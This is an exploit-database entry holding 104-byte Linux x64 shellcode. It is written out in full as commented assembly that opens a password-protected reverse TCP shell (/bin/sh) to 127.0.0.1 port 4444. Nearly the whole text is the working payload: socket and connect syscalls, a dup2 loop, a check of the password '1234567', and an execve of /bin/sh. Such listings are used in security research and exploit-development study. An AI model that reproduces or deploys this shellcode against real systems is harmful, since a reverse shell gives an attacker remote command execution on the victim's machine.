Linux/x64 - Reverse TCP (127.0.0.1:4444/TCP) Shell (/bin/sh) + Password (1234567) Shellcode (104 bytes)

EDB-ID: 43952
Author: 0x4ndr3
Published: 2017-11-11
CVE: N/A
Type: Shellcode
Platform: Linux_x86-64
Aliases: N/A
Advisory/Source: Link
Tags: N/A
Shellcode: Download Shellcode Code Download / View Raw
Shellcode Size: 104 bytes

  
_start:

; sock = socket(AF_INET, SOCK_STREAM, 0)
; AF_INET = 2
; SOCK_STREAM = 1
; syscall number 41

push 41
pop rax
push 2
pop rdi
push 1
pop rsi
cdq
syscall

; copy socket descriptor to rdi for future use
xchg rdi, rax

; server.sin_family = AF_INET
; server.sin_port = htons(PORT)
; server.sin_addr.s_addr = inet_addr("127.0.0.1")
; bzero(&server.sin_zero, 8)

push rdx ; already zeroed by "cdq" instruction
mov rbx, 0xfeffff80a3eefffd
not rbx
push rbx

; connect(sock, (struct sockaddr *)&server, sockaddr_len)

push rsp
pop rsi
mov al,42
mov dl,16
syscall

; duplicate sockets

; dup2 (new, old)

push 3
pop rsi
dup2cycle:
mov al, 33
dec esi
syscall
loopnz dup2cycle

; read passcode
; xor rax,rax - already zeroed out by prev cycle
xor rdi,rdi
push rax
push rsp
pop rsi
mov dl,8
syscall

; Authentication with password "1234567"
xchg rcx,rax
mov rbx,0x0a37363534333231
push rbx
push rsp
pop rdi
repe cmpsb
jnz wrong_pwd

; execve stack-method

push 59
pop rax
cdq ; extends rax sign into rdx, zeroing it out
push rdx
mov rbx, 0x68732f6e69622f2f
push rbx
push rsp
pop rdi
push rdx
push rsp
pop rdx
push rdi
push rsp
pop rsi
syscall

wrong_pwd:
nop

Related Posts

Comments